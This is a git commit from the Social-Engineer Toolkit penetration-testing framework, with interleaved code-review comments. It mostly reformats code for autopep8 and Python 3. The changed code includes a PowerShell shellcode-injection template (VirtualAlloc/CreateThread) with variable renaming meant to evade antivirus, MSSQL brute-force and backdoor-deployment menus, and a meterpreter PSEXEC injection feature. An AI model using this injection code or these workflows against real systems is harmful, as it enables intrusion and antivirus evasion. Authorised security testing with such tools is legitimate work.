fixes for autopep8 and python3 compatibility

This commit is contained in:
TrustedSec 2016-06-27 10:30:11 -04:00
parent 3cddcdefd5
commit bef8ce8eb0
5 changed files with 228 additions and 151 deletions


@ -14,6 +14,7 @@ version 7.2
* added a new check upon startup (which may delay the start of set for a couple seconds, but it will check to see if there is a new version of SET available for you automatically - this is displayed on the main launcher UI when you first start SET
* fixed setup.py a bit to reflect more on whats out there.. I may convert this to a standard setup installer eventually
* updated the licensing agreement - should check it out - some bold things you need to do in order to use SET!
* changed the default payload in HTA and Java Applet attack to be reverse_https instead of reverse_tcp (although both can be specified)
~~~~~~~~~~~~~~~~
version 7.1.2


@ -32,7 +32,8 @@ if not os.path.isfile("/etc/setoolkit/set.config"):
# here we check to ensure we have the latest version
data = open("/etc/setoolkit/set.config", "r").read()
if not "CONFIG_VERSION=7.2" in data:
print ("[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
print (
"[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
shutil.move("/etc/setoolkit/set.config", "/etc/setoolkit/set.config.bak")
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")
@ -75,13 +76,14 @@ try:
from Crypto.Cipher import AES
except ImportError:
print("[!] The python-pycrypto python module not installed. You will lose the ability to use multi-pyinjector.")
print(
"[!] The python-pycrypto python module not installed. You will lose the ability to use multi-pyinjector.")
pass
#########################################
#
# The Social-Engineer Toolkit (SET) #
# Written by: David Kennedy (ReL1K) #
#########################################
#
#
# this is the main menu structure for SET
@ -93,7 +95,8 @@ update_config()
# chmod routine
if operating_system == "posix":
# change permissions if nix
subprocess.Popen("chmod +x seautomate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py",
subprocess.Popen(
"chmod +x seautomate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
dns = check_config("DNS_SERVER=")
@ -125,13 +128,15 @@ for root, dirs, files in os.walk(setdir):
# if windows then do some stuff
if operating_system == "posix":
################################################
#
# ROOT CHECK
################################################
#
if os.geteuid() != 0:
print ("\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)")
print ("\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n")
print (
"\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)")
print (
"\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n")
exit_set()
# if there isn't a set_config.py file yet, create one
@ -204,12 +209,14 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# rance
if main_menu_choice == "rance":
print_warning(bcolors.BOLD + "We miss you buddy. David Jones (Rance) changed a lot of us and you'll always be apart of our lives (and SET). Fuck Cancer." + bcolors.ENDC)
print_warning(
bcolors.BOLD + "We miss you buddy. David Jones (Rance) changed a lot of us and you'll always be apart of our lives (and SET). Fuck Cancer." + bcolors.ENDC)
pause = raw_input("Press {return} to continue.")
# cavs
if main_menu_choice == "cavs":
print_warning(bcolors.BOLD + "2015-2016 CHAMPS BABY!!! C l e e e e e e v eeee l a a n n d d d d d d d d d d d " + bcolors.ENDC)
print_warning(
bcolors.BOLD + "2015-2016 CHAMPS BABY!!! C l e e e e e e v eeee l a a n n d d d d d d d d d d d " + bcolors.ENDC)
pause = raw_input("Press {return} to continue.")
# quit out
@ -263,7 +270,7 @@ except KeyboardInterrupt:
" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"))
# handle exceptions
#except Exception as error:
# except Exception as error:
# log(error)
# print ("\n\n[!] Something went wrong, printing the error: "+ str(error))
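Review bot: In the set.config version-check hunk, `data = open("/etc/setoolkit/set.config", "r").read()` leaves the file handle unclosed and the following `shutil.move` onto `set.config.bak` silently replaces any earlier backup, so the "Backing up your old one" message promises more than the code keeps; the read should be `with open("/etc/setoolkit/set.config") as fh:` / `data = fh.read()`, and the backup name could carry the old CONFIG_VERSION or a timestamp so successive upgrades do not clobber each other. The substring test `"CONFIG_VERSION=7.2" in data` would also match any later `CONFIG_VERSION=7.2x` line, so comparing the parsed value exactly would be safer. Note that autopep8 left `print (` with a space in this hunk and in the root-check hunk while the rest of the new code uses `print(`. The `if not os.path.isfile(...)` block this hunk sits in begins outside the hunk.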


@ -12,9 +12,9 @@ definepath = os.getcwd()
#
try:
while 1:
###################################################
# USER INPUT: SHOW WEB ATTACK MENU #
###################################################
#
# USER INPUT: SHOW WEB ATTACK MENU #
#
create_menu(text.fasttrack_text, text.fasttrack_menu)
attack_vector = raw_input(setprompt(["19"], ""))
@ -22,11 +22,11 @@ try:
if attack_vector == "99" or attack_vector == "quit" or attack_vector == "exit":
break
##################################
##################################
#
#
# mssql_scanner
##################################
##################################
#
#
if attack_vector == "1":
# start the menu
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
@ -38,7 +38,8 @@ try:
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print("\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
print(
"\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
if choice != "1":
@ -91,37 +92,43 @@ try:
print_status(
"Hunting for SQL servers.. This may take a little bit.")
if "/" or " " in str(range):
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
for host in iprange:
sqlport = get_sql_port(host)
if sqlport == None:
sql_nmap_scan(host)
if sql_nmap_scan != None:
sql_servers = sql_servers + host + ":" + "1433" + ","
if sqlport != None:
sql_servers = sql_servers + host + ":" + sqlport + ","
else:
range1 = range.split(" ")
for ip in range1:
sqlport = get_sql_port(ip)
if sqlport == None:
sql_nmap_scan(ip)
if sql_nmap_scan != None:
sql_servers = sql_servers + ip + ":" + "1433" + ","
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
for host in iprange:
sqlport = get_sql_port(host)
if sqlport == None:
sql_nmap_scan(host)
if sql_nmap_scan != None:
sql_servers = sql_servers + \
host + ":" + "1433" + ","
if sqlport != None:
sql_servers = sql_servers + \
host + ":" + sqlport + ","
else:
range1 = range.split(" ")
for ip in range1:
sqlport = get_sql_port(ip)
if sqlport == None:
sql_nmap_scan(ip)
if sql_nmap_scan != None:
sql_servers = sql_servers + \
ip + ":" + "1433" + ","
if sqlport != None:
sql_servers = sql_servers + ip + ":" + sqlport + ","
if sqlport != None:
sql_servers = sql_servers + \
ip + ":" + sqlport + ","
else:
# use udp discovery to get the SQL server UDP 1434
sqlport = get_sql_port(range)
# if its not closed then check nmap - if both fail then nada
# if its not closed then check nmap - if both fail then
# nada
if sqlport == None:
sql_nmap_scan(host)
if sql_nmap_scan != None:
sql_servers = sql_servers + host + ":" + "1433" + ","
sql_nmap_scan(host)
if sql_nmap_scan != None:
sql_servers = sql_servers + \
host + ":" + "1433" + ","
if sqlport != None:
sql_servers = range + ":" + sqlport
@ -168,10 +175,11 @@ try:
sql_success = mssql.brute(
servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + sql_success + ":"
# after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + \
sql_success + ":"
counter = 1
# if we specified a username list
@ -183,18 +191,22 @@ try:
# we wont break out of the loop here incase
# theres multiple usernames we want to find
if sql_success != False:
master_list = master_list + sql_success + ":"
master_list = master_list + \
sql_success + ":"
counter = 1
# if we didn't successful attack one
if counter == 0:
if sql_servers:
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server on the following SQL servers: ")
for line in sql_servers:
if line != "":
print "SQL Server: " + line.rstrip()
if sql_servers:
print_warning(
"Sorry. Unable to locate or fully compromise a MSSQL Server on the following SQL servers: ")
for line in sql_servers:
if line != "":
print("SQL Server: " + line.rstrip())
else: print_warning("Sorry. Unable to find any SQL servers to attack.")
else:
print_warning(
"Sorry. Unable to find any SQL servers to attack.")
pause = raw_input(
"Press {return} to continue to the main menu.")
# if we successfully attacked one
@ -205,10 +217,11 @@ try:
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status("SET Fast-Track attacked the following SQL servers: ")
for line in sql_servers:
if line != "":
print "SQL Servers: " + line.rstrip()
print_status(
"SET Fast-Track attacked the following SQL servers: ")
for line in sql_servers:
if line != "":
print("SQL Servers: " + line.rstrip())
print_status(
"Below are the successfully compromised systems.\nSelect the compromise SQL server you want to interact with:\n")
for success in master_names:
@ -239,8 +252,10 @@ try:
success = success.split(",")
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) + "," + passwords
print("\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n")
# ipaddr + "," + username + "," + str(port) +
# "," + passwords
print(
"\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n")
option = raw_input(
setprompt(["19", "21", "22"], "Which deployment option do you want [1]"))
if option == "":
@ -325,11 +340,11 @@ try:
print_warning(
"\nIncorrect syntax somewhere. Printing error message: " + str(e))
##################################
##################################
#
#
# exploits menu
##################################
##################################
#
#
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1,
@ -377,11 +392,11 @@ try:
except:
import src.fasttrack.exploits.f5
##################################
##################################
#
#
# sccm attack menu
##################################
##################################
#
#
if attack_vector == "3":
# load sccm attack
try:
@ -389,21 +404,21 @@ try:
except:
import src.fasttrack.sccm.sccm_main
##################################
##################################
#
#
# dell drac default credential checker
##################################
##################################
#
#
if attack_vector == "4":
# load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" %
(definepath), shell=True).wait()
##################################
##################################
#
#
# RID ENUM USER ENUMERATION
##################################
##################################
#
#
if attack_vector == "5":
print (""".______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
@ -413,7 +428,8 @@ try:
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
""")
print("\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
print(
"\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
print("\n")
ipaddr = raw_input(
setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
@ -466,13 +482,14 @@ try:
print_status("Everything is finished!")
pause = raw_input("Press {return} to go back to the main menu.")
##################################
##################################
#
#
# PSEXEC PowerShell
##################################
##################################
#
#
if attack_vector == "6":
print("\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
print(
"\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
try:
module_reload(src.fasttrack.psexec)
except:
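Review bot: In the MSSQL discovery hunk, `if sql_nmap_scan != None:` (three occurrences on the new side) compares the function object to None, which is always true, while the return value of the preceding `sql_nmap_scan(host)` call is discarded — so every host that fails the UDP 1434 probe is appended as `host:1433` whether or not nmap found the port open. Each site should bind and test the result, e.g. `nmap_hit = sql_nmap_scan(host)` followed by `if nmap_hit:` before building the `host + ":" + "1433"` entry. In the single-target branch the call `sql_nmap_scan(host)` appears to use `host`, which is only assigned by the CIDR loop, while the target there is `range` (shadowing the builtin), and `sql_servers = range + ":" + sqlport` discards anything accumulated before it. The enclosing `try:`/`while 1:` loop starts outside this hunk, and the nesting of the two `if "/" in str(range):` tests is not recoverable from the rendered page, so the exact branch structure may differ from what I infer.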


@ -1,7 +1,7 @@
#!/usr/bin/env python
##############################################
# Centralized core modules for SET #
##############################################
#
# Centralized core modules for SET #
#
import re
import sys
import socket
@ -17,15 +17,18 @@ import base64
from src.core import dictionaries
import io
import trace
import urllib2
from urllib import *
if sys.version_info >= (3, 0):
# python 3 removes reduce from builtin and into functools
from functools import *
# needed for backwards compatibility of python2 vs 3 - need to convert to threading eventually
try: import thread
except ImportError: import _thread as thread
# needed for backwards compatibility of python2 vs 3 - need to convert to
# threading eventually
try:
import thread
except ImportError:
import _thread as thread
try:
raw_input
@ -38,10 +41,13 @@ try:
except ImportError:
print("[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications.")
print(
"[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications.")
pass
# get the main SET path
def definepath():
if check_os() == "posix":
if os.path.isfile("setoolkit"):
@ -167,7 +173,8 @@ def setprompt(category, text):
if text == "":
for level in category:
level = dictionaries.category(level)
prompt += ":" + bcolors.UNDERL + bcolors.DARKCYAN + level + bcolors.ENDC
prompt += ":" + bcolors.UNDERL + \
bcolors.DARKCYAN + level + bcolors.ENDC
promptstring = str(prompt)
promptstring += ">"
return promptstring
@ -176,7 +183,8 @@ def setprompt(category, text):
# iterate through the list received
for level in category:
level = dictionaries.category(level)
prompt += ":" + bcolors.UNDERL + bcolors.DARKCYAN + level + bcolors.ENDC
prompt += ":" + bcolors.UNDERL + \
bcolors.DARKCYAN + level + bcolors.ENDC
promptstring = str(prompt)
promptstring = promptstring + "> " + text + ":"
return promptstring
@ -203,7 +211,7 @@ def return_continue():
"<return> " + bcolors.ENDC + "to continue"))
pause = raw_input()
############ DEBUGGING ###############
# DEBUGGING ###############
# ALWAYS SET TO ZERO BEFORE COMMIT!
DEBUG_LEVEL = 0
# 0 = Debugging OFF
@ -235,8 +243,8 @@ def mod_name():
calling_module = inspect.getmodulename(frame_records[1])
return calling_module
##########################################
############ RUNTIME MESSAGES ############
#
# RUNTIME MESSAGES ############
def print_status(message):
@ -264,6 +272,7 @@ def get_version():
define_version = '7.2'
return define_version
class create_menu:
def __init__(self, text, menu):
@ -421,7 +430,8 @@ def grab_ipaddress():
# check if IP address is valid
ip_check = is_valid_ip(rhost)
if ip_check == False:
rhost = raw_input("[!] Invalid ip address try again: ")
rhost = raw_input(
"[!] Invalid ip address try again: ")
if ip_check == True:
break
return rhost
@ -605,17 +615,20 @@ def meterpreter_reverse_tcp_exe(port):
# import the system path for payloadgen in SET
sys.path.append("src/core/payloadgen")
try:
debug_msg("setcore", "importing 'src.core.payloadgen.create_payloads'", 1)
debug_msg(
"setcore", "importing 'src.core.payloadgen.create_payloads'", 1)
module_reload(create_payloads)
except:
debug_msg("setcore", "importing 'src.core.payloadgen.create_payloads'", 1)
debug_msg(
"setcore", "importing 'src.core.payloadgen.create_payloads'", 1)
import create_payloads
random_value = generate_random_string(5, 10)
# copy the created executable to program_junk
print_status("Executable created under %s/%s.exe" % (setdir, random_value))
subprocess.Popen("cp %s/msf.exe %s/%s.exe" % (setdir, setdir, random_value),
subprocess.Popen(
"cp %s/msf.exe %s/%s.exe" % (setdir, setdir, random_value),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
#
# Start a metasploit multi handler
@ -720,7 +733,8 @@ def java_applet_attack(website, port, directory):
applet_name = generate_random_string(6, 15) + ".jar"
# lastly we need to copy over the signed applet
subprocess.Popen("cp %s/Signed_Update.jar %s/%s" % (setdir, directory, applet_name),
subprocess.Popen(
"cp %s/Signed_Update.jar %s/%s" % (setdir, directory, applet_name),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# start the web server by running it in the background
@ -855,7 +869,8 @@ def upx(path_to_file):
print_info(
"Packing the executable and obfuscating PE file randomly, one moment.")
# packing executable
subprocess.Popen("%s -9 -q -o %s/temp.binary %s" % (upx_path, setdir, path_to_file),
subprocess.Popen(
"%s -9 -q -o %s/temp.binary %s" % (upx_path, setdir, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# move it over the old file
subprocess.Popen("mv %s/temp.binary %s" % (setdir, path_to_file),
@ -902,28 +917,33 @@ def show_banner(define_version, graphic):
""" + bcolors.GREEN + """ Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
""")
print(bcolors.BLUE + """ Join us on irc.freenode.net in channel #setoolkit\n""" + bcolors.ENDC)
print(bcolors.BLUE +
""" Join us on irc.freenode.net in channel #setoolkit\n""" + bcolors.ENDC)
print(bcolors.BOLD + """ The Social-Engineer Toolkit is a product of TrustedSec.\n\n Visit: """ +
bcolors.GREEN + """https://www.trustedsec.com\n""" + bcolors.ENDC)
# here we check if there is a new version of SET - if there is, then display a banner
# here we check if there is a new version of SET - if there is, then
# display a banner
cv = get_version()
# pull version
try:
response = urllib2.urlopen('https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/setcore.py')
try:
response = urlopen(
'https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/setcore.py')
setcheck = response.readlines()
for line in setcheck:
line = line.rstrip()
if "define_version =" in line:
# define_version = '7.1.2'
version = line.replace("define_version = ", "").replace("'", "", 2).replace(" ", "")
# define_version = '7.1.2'
version = line.replace("define_version = ", "").replace(
"'", "", 2).replace(" ", "")
if cv != version:
print(bcolors.RED + " There is a new version of SET available.\n " + bcolors.GREEN + " Your version: " + bcolors.RED + cv + bcolors.GREEN + "\n Current version: " + bcolors.ENDC + bcolors.BOLD + version + bcolors.YELLOW + "\n\nPlease update SET to the latest before submitting any git issues.\n\n" + bcolors.ENDC)
print(bcolors.RED + " There is a new version of SET available.\n " + bcolors.GREEN + " Your version: " + bcolors.RED + cv + bcolors.GREEN +
"\n Current version: " + bcolors.ENDC + bcolors.BOLD + version + bcolors.YELLOW + "\n\nPlease update SET to the latest before submitting any git issues.\n\n" + bcolors.ENDC)
except Exception as err:
print err
print(err)
def show_graphic():
menu = random.randrange(2, 14)
@ -1136,8 +1156,6 @@ def show_graphic():
``:::::::::''""" + bcolors.ENDC)
#
# identify if set interactive shells are disabled
#
@ -1167,7 +1185,8 @@ def menu_back():
def custom_template():
try:
print (" [****] Custom Template Generator [****]\n")
print ("Always looking for new templates! In the set/src/templates directory send an email\nto info@trustedsec.com if you got a good template!")
print (
"Always looking for new templates! In the set/src/templates directory send an email\nto info@trustedsec.com if you got a good template!")
author = raw_input(setprompt("0", "Enter the name of the author"))
filename = randomgen = random.randrange(1, 99999999999999999999)
filename = str(filename) + (".template")
@ -1201,7 +1220,7 @@ def check_length(choice, max):
while 1:
if counter == 1:
choice = raw_input(bcolors.YELLOW + bcolors.BOLD +
"[!] " + bcolors.ENDC + "Invalid choice try again: ")
"[!] " + bcolors.ENDC + "Invalid choice try again: ")
# try block in case its not a integer
try:
# check to see if its an integer
@ -1461,7 +1480,8 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
# where if it detects 64 bit it'll use x86 powershell. This is useful so
# we don't have to guess if its x64 or x86 and what type of shellcode to
# use
# added random vars before and after to change strings - AV you are seriously ridiculous.
# added random vars before and after to change strings - AV you are
# seriously ridiculous.
var1 = generate_random_string(3, 4)
var2 = generate_random_string(3, 4)
var3 = generate_random_string(3, 4)
@ -1474,12 +1494,15 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % shellcode)
# run it through a lame var replace
powershell_command = powershell_code.replace("$1", "$" + var1).replace("$c", "$" + var2).replace("$2", "$" + var3).replace("$3", "$" + var4).replace("$x", "$" + var5)
powershell_command = powershell_code.replace("$1", "$" + var1).replace(
"$c", "$" + var2).replace("$2", "$" + var3).replace("$3", "$" + var4).replace("$x", "$" + var5)
# unicode and base64 encode and return it
return base64.b64encode(powershell_command.encode('utf_16_le')).decode("ascii")
# generate base shellcode
def generate_shellcode(payload, ipaddr, port):
msf_path = meta_path()
@ -1490,13 +1513,17 @@ def generate_shellcode(payload, ipaddr, port):
data = proc.communicate()[0]
data = data.decode('ascii')
# start to format this a bit to get it ready
#repls = {';': '', ' ': '', '+': '', '"': '', '\n': '',
# repls = {';': '', ' ': '', '+': '', '"': '', '\n': '',
# 'unsigned char buf=': '', 'unsignedcharbuf[]=': ''}
repls = [';', ' ', '+', '"', '\n', 'unsigned char buf=', 'unsignedcharbuf[]=', "b'", "'", '\\n']
for repl in repls: data = data.replace(repl, "")
repls = [';', ' ', '+', '"', '\n', 'unsigned char buf=',
'unsignedcharbuf[]=', "b'", "'", '\\n']
for repl in repls:
data = data.replace(repl, "")
return data
# this will take input for shellcode and do a replace for IP addresses
def shellcode_replace(ipaddr, port, shellcode):
# split up the ip address
ip = ipaddr.split('.')
@ -1560,6 +1587,8 @@ def shellcode_replace(ipaddr, port, shellcode):
return shellcode
# exit routine
def exit_set():
cleanup_routine()
print("\n\n Thank you for " + bcolors.RED + "shopping" + bcolors.ENDC +
@ -1605,6 +1634,8 @@ def metasploit_shellcode(payload, ipaddr, port):
# here we encrypt via aes, will return encrypted string based on secret
# key which is random
def encryptAES(secret, data):
# the character used for padding--with a block cipher such as AES, the value
@ -1677,6 +1708,8 @@ class DNSQuery:
return packet
# main dns routine
def dns():
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udps.bind(('', 53))
@ -1692,10 +1725,14 @@ def dns():
udps.close()
# start dns
def start_dns():
thread.start_new_thread(dns, ())
# the main ~./set path for SET
def setdir():
if check_os() == "posix":
return os.path.join(os.path.expanduser('~'), '.set')
@ -1825,16 +1862,21 @@ def get_sql_port(host):
pass
# this will manually tcp connect if needed
def sql_nmap_scan(ipaddr):
proc = subprocess.Popen("nmap -v -sT -p1433 %s" % (ipaddr), shell=True, stdout=subprocess.PIPE)
output = proc.communicate()[0].split("\n")
result = ""
for result in output:
if "Discovered open port" in result:
result = result.split("on ")[1]
return result
proc = subprocess.Popen("nmap -v -sT -p1433 %s" %
(ipaddr), shell=True, stdout=subprocess.PIPE)
output = proc.communicate()[0].split("\n")
result = ""
for result in output:
if "Discovered open port" in result:
result = result.split("on ")[1]
return result
# capture output from a function
def capture(func, *args, **kwargs):
"""Capture the output of func when called with the given arguments.
@ -1886,6 +1928,8 @@ def check_kali():
return "Non-Kali"
# here we give multiple options to specify for SET java applet
def applet_choice():
# prompt here
@ -1928,18 +1972,24 @@ Select which option you want:
module_reload(src.html.unsigned.verified_sign)
# reload module function for python 2 and python 3
def module_reload(module):
if sys.version_info >= (3,0):
if sys.version_info >= (3, 0):
import importlib
importlib.reload(module)
else:
reload(module)
# used to replace any input that we have from python 2 to python 3
def input(string):
return raw_input(string)
return raw_input(string)
# fetch URL needed for web cloning
def fetch_template():
fileopen = open(setdir + "/site.template").readlines()
for line in fileopen:
@ -1953,7 +2003,7 @@ def fetch_template():
# tail a file
def tail(filename):
if os.path.isfile(filename):
file = open(filename,'r')
file = open(filename, 'r')
st_results = os.stat(filename)
st_size = st_results[6]
file.seek(st_size)
@ -1965,6 +2015,7 @@ def tail(filename):
time.sleep(1)
file.seek(where)
else:
print(line,) # already has newline
print(line,) # already has newline
else: print_error("File not found, cannot tail.")
else:
print_error("File not found, cannot tail.")
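Review bot: `sql_nmap_scan` still builds the nmap command as a shell string with `shell=True`, so whatever `ipaddr` contains — it appears to originate from interactive operator input in the fast-track menu — is handed to `/bin/sh` unescaped; an argument list removes that. The same hunk is also not Python 3 clean despite the commit's intent: `proc.communicate()[0]` is `bytes` on Python 3, so `.split("\n")` raises `TypeError`, and because `result` is reused as the loop variable the function returns the last line of nmap's output (usually `""`) rather than `None` when no open port is seen, which callers cannot distinguish from a hit. The rewrite below decodes once, returns early on a match and returns `None` otherwise; the value returned on a match is unchanged.

```python
def sql_nmap_scan(ipaddr):
    # argument list, not a shell string: ipaddr is operator-supplied text
    proc = subprocess.Popen(["nmap", "-v", "-sT", "-p1433", ipaddr],
                            stdout=subprocess.PIPE)
    # communicate() yields bytes on Python 3; decode before splitting
    output = proc.communicate()[0].decode("utf-8", "replace").split("\n")
    for line in output:
        if "Discovered open port" in line:
            return line.split("on ")[1]
    return None
```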


@ -113,25 +113,26 @@ def update_config():
CONFIG_DATE='""" + timestamp + """'\n""")
for line in init_file:
try:
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
quoted = value_type(setting)
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + '=' + value + '\n')
except: pass
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + '=' + value + '\n')
except:
pass
init_file.close()
new_config.close()